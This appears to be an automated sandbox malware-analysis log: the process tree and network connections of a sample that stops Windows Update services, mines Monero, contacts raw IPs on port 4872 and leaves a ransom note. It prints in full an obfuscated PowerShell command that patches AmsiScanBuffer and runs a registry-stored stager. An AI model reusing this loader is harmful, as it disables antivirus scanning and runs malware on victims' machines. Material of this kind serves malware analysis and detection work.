C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:hUtTGcpIBRWx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cuszbhKDZHUugU,[Parameter(Position=1)][Type]$TzthIiuPXy)$BpDXKpeuMBK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+''+'m'+''+'o'+'ry'+[Char](77)+''+'o'+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'e'+'a'+'l'+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$BpDXKpeuMBK.DefineConstructor(''+'R'+'T'+'S'+'p'+[Char](101)+'c'+[Char](105)+''+[Char](97)+'lN'+[Char](97)+'m'+'e'+','+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+'ig,'+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$cuszbhKDZHUugU).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e'+','+'Man'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$BpDXKpeuMBK.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$TzthIiuPXy,$cuszbhKDZHUugU).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $BpDXKpeuMBK.CreateType();}$AeIOUWqdeFhrt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+'m'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+'ve'+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$iTlDFUyQFnghAn=$AeIOUWqdeFhrt.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+'c'+','+[Char](83)+''+'t'+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZlMhhgPuJPEJZMiKYVc=hUtTGcpIBRWx @([String])([IntPtr]);$DGoBTzKEyyvelOULPFuXKR=hUtTGcpIBRWx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$erEVRAlXqJK=$AeIOUWqdeFhrt.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+'l'+'l'+'')));$OkQLxsSoUiELgP=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$erEVRAlXqJK,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$JRRmeUNoqiZyPvdtP=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$erEVRAlXqJK,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'r'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$eycvYqX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OkQLxsSoUiELgP,$ZlMhhgPuJPEJZMiKYVc).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$dBFykBqhboaywzxVD=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$eycvYqX,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+'S'+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+'fe'+'r'+'')));$aYFVrPYVCg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRRmeUNoqiZyPvdtP,$DGoBTzKEyyvelOULPFuXKR).Invoke($dBFykBqhboaywzxVD,[uint32]8,4,[ref]$aYFVrPYVCg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dBFykBqhboaywzxVD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRRmeUNoqiZyPvdtP,$DGoBTzKEyyvelOULPFuXKR).Invoke($dBFykBqhboaywzxVD,[uint32]8,0x20,[ref]$aYFVrPYVCg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3dc28f87-b8e3-4dfa-a166-a006b4a498ba}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ec80ab00-b363-4b21-bbe8-85111939d665}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff982dedcf8,0x7ff982dedd04,0x7ff982dedd10
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=1976 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1476,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2240 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2248 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3200 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3244 /prefetch:1
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4400,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4420 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2c8,0x368,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1808,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2352,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2344 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1924,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3480,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3512,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5040,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5056 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,15884832059890627897,13472977586051003899,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5188 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1596,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=4816 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5488,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5584,i,16324875341636741138,164245467812944278,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x25c,0x260,0x264,0x258,0x280,0x7ff96d53f208,0x7ff96d53f214,0x7ff96d53f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1940,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2860 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2832,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2828 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2368,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4392,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4536,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4684,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4680,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4708,i,3926038481267499890,5873808597309677053,262144 --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:8
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /f /tn "CompPkg"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBBD4.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /delete /tn "HOST" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KrCtYfhVKMt4.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout /T 5 /NOBREAK
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | appengine.google.com | udp |
| US | 174.61.118.194:4872 | tcp | |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:443 | ipwho.is | tcp |
| US | 73.179.34.234:4872 | tcp | |
| US | 174.61.118.194:4872 | tcp | |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| DE | 142.250.184.195:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.185.68:443 | www.google.com | tcp |
| DE | 142.250.185.68:443 | www.google.com | tcp |
| DE | 142.250.185.68:443 | www.google.com | tcp |
| DE | 142.250.185.68:443 | www.google.com | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:80 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| DE | 142.250.185.238:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 88.221.135.1:443 | www.bing.com | udp |
| GB | 88.221.135.1:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 95.101.143.183:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
| US | 8.8.8.8:53 | nyc.moneroocean.stream | udp |
